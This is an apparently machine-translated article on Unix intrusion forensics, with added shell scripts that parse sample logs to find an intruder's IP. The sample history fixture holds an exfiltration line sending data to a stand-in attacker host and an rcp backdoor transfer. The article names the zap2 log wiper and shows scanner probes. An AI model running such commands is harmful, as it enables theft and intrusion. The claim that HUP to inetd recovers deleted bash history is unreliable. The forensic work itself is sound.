  Security: Unix operating system intrusion tracking Strikes Back
  Add Date : 2018-11-21      
After an intrusion into a Unix system it is very important to determine the damage done and the source address of the intruder's attacks. Although most intruders know how to use machines they have already compromised as springboards to attack your server, the target information gathering (exploratory scans) they carry out before the formal attack often starts from their own machines. This article introduces how to analyze the logs of the intruded system to determine the intruder's IP.


1. The messages log

/var/adm is the UNIX log directory (under Linux it is /var/log). A considerable number of the logs under it are stored in ASCII text format. Let us first concentrate on the messages file, which is also of concern to the intruder, since it records information at the system level. Most of what is logged here is of no use to us.

For example:

Apr 25 21:49:30 2000 unix: Copyright (c) 1983-1997, Sun Microsystems, Inc.

Apr 25 21:49:30 2000 unix: mem = 262144K (0x10000000)

Such records display copyright or hardware information, while:

Apr 29 19:06:47 www login[28845]: FAILED LOGIN 1 FROM xxx.xxx.xxx.xxx, User not known to the underlying authentication module

records a failed login, and:

Apr 29 22:05:45 game PAM_pwdb[29509]: (login) session opened for user ncx by (uid=0)

records a session being opened for user ncx by root (uid 0). So the first step should be kill -HUP `cat /var/run/syslogd.pid` (of course, the intruder may already have done this for us ;-), so that we get no useful information).

At the following website you can find a large number of audit log analysis tools and scripts:
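The extraction described above, as an added example that is not part of the original article: a small POSIX shell script that builds a constructed messages file (documentation addresses 192.0.2.10 and 198.51.100.7, made-up host names and PIDs), counts the source addresses named in FAILED LOGIN records, and picks out sessions that root opened for a given user. The function names and the sample lines are assumptions made for the demo.

```shell
#!/bin/sh
# Added example (not from the original article): pull the source addresses out of
# FAILED LOGIN records in a messages file and count them, so that repeated
# password guessing stands out among the copyright and hardware noise.

# Write a constructed sample messages file (the addresses are documentation
# ranges, not real hosts) to the path given as $1.
write_sample_messages() {
  cat > "$1" <<'EOF'
Apr 25 21:49:30 2000 unix: Copyright (c) 1983-1997, Sun Microsystems, Inc.
Apr 25 21:49:30 2000 unix: mem = 262144K (0x10000000)
Apr 29 19:06:47 www login[28845]: FAILED LOGIN 1 FROM 192.0.2.10, User not known to the underlying authentication module
Apr 29 19:06:52 www login[28846]: FAILED LOGIN 2 FROM 192.0.2.10, Authentication failure
Apr 29 19:07:01 www login[28847]: FAILED LOGIN 1 FROM 198.51.100.7, User not known to the underlying authentication module
Apr 29 22:05:45 game PAM_pwdb[29509]: (login) session opened for user ncx by (uid=0)
EOF
}

# Print "count source" for every address named in a FAILED LOGIN record of the
# messages file $1, most frequent source first.
failed_login_sources() {
  grep 'FAILED LOGIN' "$1" \
    | sed -n 's/.*FROM \([^,]*\),.*/\1/p' \
    | sort | uniq -c | sort -rn \
    | awk '{ print $1, $2 }'
}

# Print the records in which a session was opened for user $2 by uid 0,
# i.e. a login that root created for that user rather than the user logging in.
root_opened_sessions() {
  grep "session opened for user $2 by (uid=0)" "$1"
}

# Stand-alone demonstration on the constructed sample: sh script.sh demo
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp)
  write_sample_messages "$tmp"
  echo "failed logins by source:"
  failed_login_sources "$tmp"
  echo "sessions root opened for ncx:"
  root_opened_sessions "$tmp" ncx
  rm -f "$tmp"
fi
```

On a real system point failed_login_sources at /var/adm/messages or /var/log/messages. A syslogd that has been stopped writes nothing, so an empty result over the time of the incident is itself worth noting.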


2. wtmp, utmp and ftp logs

In the /var/adm, /var/log or /etc directory you can find the files named wtmp and utmp, which record when and from where each user telnetted to the host. The oldest and most popular tool hackers use against them is zap2 (the compiled file is commonly called z2, or wipe), which erases the record of the user's login from these two files. But out of laziness or because of poor network speed (an echo delay of more than 3 seconds makes the session fall apart, and I have often met 10 times that echo delay), many intruders never upload or compile this tool, and the administrator can then use the lastlog command to get the source address of the intruder's last connection (of course, this address may be one of their springboards).

The ftp log is usually /var/log/xferlog, a text file that records in detail the time, source, file name and so on of every file uploaded via FTP. However, because this log is too obvious, slightly more sophisticated intruders rarely use this method to transfer files; using rcp is somewhat more common. Of course, you can run cat /var/log/xferlog | grep -v 202.106.147 to see the addresses that should not be there.
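As an added example (not from the original article) of the xferlog check above: the script below writes a constructed xferlog and lists uploads from hosts outside a trusted prefix. It assumes the standard wu-ftpd xferlog layout, in which the remote host is the 7th field and the direction flag (i for an upload, o for a download) the 12th; the sample lines and address ranges are constructed for the demo, and the trusted prefix 202.106.147 from the text is passed with a trailing dot so that it only matches whole octets.

```shell
#!/bin/sh
# Added example (not from the original article): list FTP uploads recorded in an
# xferlog that came from hosts outside a trusted address prefix, which is the
# "grep -v 202.106.147" idea with the direction field taken into account.
# Assumed wu-ftpd xferlog layout: five date fields, transfer time, remote host,
# size, file name, type, action flag, direction (i = upload, o = download),
# access mode, user name, service, auth method, auth user id, status.

# Write a constructed sample xferlog to $1 (documentation addresses, not real hosts).
write_sample_xferlog() {
  cat > "$1" <<'EOF'
Fri Apr 28 01:12:33 2000 2 192.0.2.10 4096 /tmp/backdoor b _ i r nobody ftp 0 * c
Fri Apr 28 09:00:01 2000 1 202.106.147.5 1024 /pub/readme.txt a _ o r anonymous ftp 0 * c
Fri Apr 28 09:30:12 2000 1 202.106.147.9 2048 /pub/upload/report.txt a _ i r staff ftp 0 * c
Fri Apr 28 10:15:42 2000 3 198.51.100.7 65536 /home/ncx/sniff.tgz b _ i r ncx ftp 1 ncx c
EOF
}

# Print "time host -> file (user name)" for each upload in xferlog $1 whose remote
# host does not start with the trusted prefix $2 (give the prefix a trailing dot).
xferlog_foreign_uploads() {
  awk -v prefix="$2" '
    $12 == "i" && index($7, prefix) != 1 {
      printf "%s %s %s %s %s -> %s (user %s)\n", $1, $2, $3, $4, $7, $9, $14
    }' "$1"
}

# Print "count host" for the foreign hosts that uploaded, busiest first.
xferlog_foreign_upload_hosts() {
  xferlog_foreign_uploads "$1" "$2" | awk '{ print $5 }' | sort | uniq -c | sort -rn \
    | awk '{ print $1, $2 }'
}

# Stand-alone demonstration: sh script.sh demo
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp)
  write_sample_xferlog "$tmp"
  xferlog_foreign_uploads "$tmp" 202.106.147.
  xferlog_foreign_upload_hosts "$tmp" 202.106.147.
  rm -f "$tmp"
fi
```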


3. Shell history files

After obtaining root privileges, intruders create their own accounts for the intrusion; a more advanced technique is to use system user names that are normally unused, such as uucp or lp, and give them a password. After the intrusion, even if the intruder has deleted files such as .sh_history or .bash_history, executing kill -HUP `cat /var/run/inetd.pid` can cause the bash command records still held in memory to be written back to disk. Then run find / -name .sh_history -print and carefully examine each suspicious shell command log, especially when you find a .sh_history file in directories such as /usr/spool/lp (lp's home dir) or /usr/lib/uucp (uucp's home dir). Intruders often need to transfer files between the target and their working machine, and to avoid syslog they may ftp from the target machine to their working machine, so in .sh_history you may find commands such as ftp xxx.xxx.xxx.xxx or rcp nobody@xxx.xxx.xxx.xxx:/tmp/backdoor /tmp/backdoor that reveal the intruder's IP or domain name.
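As an added example (not the article's own code) of the search for history files described above: the script builds a constructed directory tree with .sh_history and .bash_history files in the lp and uucp home directories the text names, finds them, and pulls the remote host out of ftp, telnet, rcp and scp commands. The directory root, file contents and host names are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original article): locate shell history files under a
# directory tree and pull the remote hosts out of ftp/telnet/rcp/scp commands in
# them. The directory names and commands below are constructed for the demo.

# Build a constructed tree under $1 with history files in the places the text mentions.
make_sample_tree() {
  mkdir -p "$1/usr/spool/lp" "$1/usr/lib/uucp" "$1/home/ncx"
  cat > "$1/usr/spool/lp/.sh_history" <<'EOF'
ls -la /tmp
ftp 192.0.2.10
rcp nobody@198.51.100.7:/tmp/backdoor /tmp/backdoor
cat /etc/passwd
EOF
  cat > "$1/usr/lib/uucp/.bash_history" <<'EOF'
uname -a
scp sniff.tgz user@evil.example.net:/incoming
EOF
  : > "$1/home/ncx/notes.txt"
}

# Print every .sh_history or .bash_history file below $1 (the text's
# "find / -name .sh_history -print", extended to bash history).
find_history_files() {
  find "$1" -type f \( -name .sh_history -o -name .bash_history \) -print | sort
}

# Print "command host" for each ftp/telnet/rcp/scp command in history file $1.
# For rcp/scp the host is taken from the user@host:path argument.
transfer_hosts_in_history() {
  awk '
    $1 == "ftp" || $1 == "telnet" { print $1, $2; next }
    $1 == "rcp" || $1 == "scp" {
      for (i = 2; i <= NF; i++) if (index($i, ":") > 0) {
        host = $i
        sub(/:.*$/, "", host)   # drop the remote path
        sub(/^.*@/, "", host)   # drop the user@ part
        print $1, host
      }
    }' "$1"
}

# Run the extraction over every history file found under $1, prefixed by file name.
transfer_hosts_under() {
  find_history_files "$1" | while read -r f; do
    transfer_hosts_in_history "$f" | sed "s|^|$f: |"
  done
}

# Stand-alone demonstration: sh script.sh demo
if [ "${1:-}" = "demo" ]; then
  root=$(mktemp -d)
  make_sample_tree "$root"
  transfer_hosts_under "$root"
  rm -rf "$root"
fi
```

On a real system call transfer_hosts_under / and read the hits in context; a history file owned by lp or uucp that contains any of these commands is the case the text singles out.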

4. http server log

This is probably the most effective way to find the true origin of the intruder's attack. Take the most popular server, Apache, as an example: under the logs directory of its installation you can find the file access.log, which records each visitor's IP, access time and the content requested. After the intrusion we should be able to find records similar to the following in this file:

xxx.xxx.xxx.xxx - - [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe" 404 -

xxx.xxx.xxx.xxx - - [28/Apr/2000:00:28:57 -0800] "GET /msads/Samples/SELECTOR/showcode.asp" 404 -

From these, someone at IP xxx.xxx.xxx.xxx tried on April 28, 2000 at 0:28 to access the file /msads/Samples/SELECTOR/showcode.asp, which is the trace left behind by a web CGI scanner. Most web scanners are based on MS operating systems, and for speed, intruders who use Unix-based scanners often choose the server nearest to them. Combining the attack time with the IP, we can learn a lot about the intruder.
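The access.log reading above, as an added example (not from the original article): the script writes a constructed common-log-format access.log containing the two scanner requests from the text plus ordinary traffic, and reports the clients that have accumulated a given number of 404 responses together with the first and last time they were seen, which is the combination of attack time and IP the text recommends. Field positions assume the common log format; the addresses and file names are constructed.

```shell
#!/bin/sh
# Added example (not from the original article): flag clients whose requests in an
# Apache common-log-format access.log are mostly 404s within a short span, the
# footprint a CGI scanner leaves, and show what one client requested.
# Assumed field layout: client ident user [time zone] "method path proto" status bytes.

# Constructed sample access.log written to $1 (documentation addresses only).
write_sample_access_log() {
  cat > "$1" <<'EOF'
192.0.2.10 - - [28/Apr/2000:00:28:57 -0800] "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0" 404 -
192.0.2.10 - - [28/Apr/2000:00:29:05 -0800] "GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
192.0.2.10 - - [28/Apr/2000:00:29:06 -0800] "GET /cgi-bin/phf HTTP/1.0" 404 -
203.0.113.5 - - [28/Apr/2000:08:10:00 -0800] "GET /index.html HTTP/1.0" 200 1234
203.0.113.5 - - [28/Apr/2000:08:10:02 -0800] "GET /images/logo.gif HTTP/1.0" 200 5678
198.51.100.7 - - [28/Apr/2000:09:00:00 -0800] "GET /missing.html HTTP/1.0" 404 -
EOF
}

# Print "client 404s first_time last_time" for each client in $1 with at least $2
# responses of status 404, sorted by client address.
scanner_suspects() {
  awk -v threshold="$2" '
    $9 == "404" {
      n[$1]++
      t = substr($4, 2)             # strip the leading "["
      if (!($1 in first)) first[$1] = t
      last[$1] = t
    }
    END {
      for (c in n) if (n[c] >= threshold)
        printf "%s %d %s %s\n", c, n[c], first[c], last[c]
    }' "$1" | sort
}

# Print "time path status" for every request that client $2 made in $1.
requests_from() {
  awk -v client="$2" '$1 == client { print substr($4, 2), $7, $9 }' "$1"
}

# Stand-alone demonstration: sh script.sh demo
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp)
  write_sample_access_log "$tmp"
  scanner_suspects "$tmp" 3
  requests_from "$tmp" 192.0.2.10
  rm -f "$tmp"
fi
```

A single 404 from 198.51.100.7 is a typo or a stale link; three probes for known CGI names within ten seconds from 192.0.2.10 is the scan the text describes, and the first timestamp is the one to line up against the other logs.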

5. core dump

This is a relatively complex but also effective method. A safe and stable daemon will not dump core while running. When an intruder exploits a service remotely, many services are executing the getpeername() socket call (see socket programming), so the intruder's IP is also held in memory; when the service overflows, the system dumps the process's memory pages into a core file, which means that in a large section of chaotic characters (in fact the process's global variables) you may find the IP from which the exploit was performed. BTW: this was written with reference to the post at http://members.tripod.com/mixtersecurity/paper.html. I did a remote attack test against cmsd, but only found, in the middle, some of the commands the remote intruder used to overflow it, and did not find the IP. Even so, there is still reason to believe the words of Mixter (the author of paper.html).
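As an added example (not from the article or from Mixter's paper) of the core-dump search above: the script writes a constructed stand-in for a core file (printable fragments separated by non-printable bytes) and extracts every string in it that is a valid dotted quad, rejecting tokens such as 999.1.1.1 or a five-part version string that a plain grep for digits and dots would report. It uses tr to split at non-printable bytes so that it does not depend on the strings utility from binutils; the byte content and the address are constructed.

```shell
#!/bin/sh
# Added example (not from the original article): pull candidate IPv4 addresses out
# of a binary core file by splitting it at non-printable bytes, which is what
# "strings core | grep" does without depending on binutils being installed.

# Write a constructed stand-in for a core file to $1: printable fragments
# separated by non-printable bytes, including a bogus dotted quad (999.1.1.1)
# and a five-part version string that must not be reported.
write_sample_core() {
  printf 'stack\001\002\377peer=192.0.2.10\200argv[0]=cmsd\001x999.1.1.1\377ver 1.2.3.4.5' > "$1"
}

# Print every distinct string in $1 that is a valid dotted quad (four octets,
# each 0-255), one per line.
dotted_quads_in_file() {
  tr -c '[:print:]' '\n' < "$1" \
    | awk '
      {
        n = split($0, tok, /[^0-9.]+/)       # tokens made only of digits and dots
        for (i = 1; i <= n; i++)
          if (tok[i] ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {
            split(tok[i], o, ".")
            if (o[1] <= 255 && o[2] <= 255 && o[3] <= 255 && o[4] <= 255)
              print tok[i]
          }
      }' \
    | sort -u
}

# Stand-alone demonstration: sh script.sh demo
if [ "${1:-}" = "demo" ]; then
  tmp=$(mktemp)
  write_sample_core "$tmp"
  dotted_quads_in_file "$tmp"
  rm -f "$tmp"
fi
```

On a real core file the list will also contain the daemon's own listening address, loopback and whatever configuration strings the process held, so each candidate still has to be checked against the connection logs of the same time.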

6. The proxy server logs

A proxy is often used on medium-sized enterprise networks as the interface for exchanging information between the inside and the outside, and it faithfully records the content each user accesses, including of course the content accessed by the intruder. Take the most common proxy, squid, as an example: you can usually find the huge access.log file under /usr/local/squid/logs/. Because records are appended to the log very quickly, it should be backed up promptly after an incident. You can get squid log analysis scripts at the following address: http://www.squid-cache.org/Doc/Users-Guide/added/stats.html. By analyzing the accesses to sensitive files in the access log, you can find out who accessed secured content and when.

7. router log

By default the router does not record any scans or logins, so the intruder can use it as a springboard to carry out attacks. If your enterprise network is divided into a militarized zone and a demilitarized zone, then adding the router's log records will help in tracking the intruder later. More importantly, such an arrangement lets the administrator determine whether the attacker is an insider or an outsider. Of course, you need an extra server on which to place the router.log file.

On the CISCO router:

router(config)# logging facility syslog

router(config)# logging trap informational

router(config)# logging [server name]

On the log server:

I. Add a line to /etc/syslog.conf:

*.info /var/log/router.log

II. Create the log file:

touch /var/log/router.log

III. Restart the syslogd process:

kill -HUP `cat /var/run/syslogd.pid`

It is unlikely that an intruder can get through a whole attack without ever attempting to establish a TCP connection to the target; there are many subjective and objective reasons for this, and an attack that leaves no log at all is not easy. If we spend enough time and effort, we can analyze the information we want out of a large number of logs. As for the intruder's mindset, the greater the privileges they have obtained on the target machine, the more conservative they tend to be in the way they build connections to it. Careful analysis of the early logs, especially the part containing the scans, can yield a greater harvest.

Log auditing is only a passive means of defense after an intrusion. Taking the initiative means strengthening your own learning and upgrading or updating the system in time. Being prepared is the most effective way to prevent intrusion.
  CopyRight 2002-2016 newfreesoft.com, All Rights Reserved.